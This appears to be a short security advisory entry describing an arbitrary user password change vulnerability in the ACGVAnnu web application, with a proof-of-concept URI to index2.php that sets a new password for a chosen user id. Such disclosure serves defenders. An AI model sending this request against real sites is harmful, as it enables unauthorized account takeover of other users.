|
ACGVAnnu Arbitrary User Password Change Vulnerability
An attacker can exploit this issue via a web client. The following proof-of-concept URI is available: http://www.example.com/index2.php?id=&nom=ajann2&prenom=ajann2&pass=0002455&rubrik=modif&fo_remp=oui&id=167&mail=a&url=http://a&titre=a&descript=+a+&categorie=G%E9n%E9ral&Submit=Gonder |
|
|
Privacy Statement |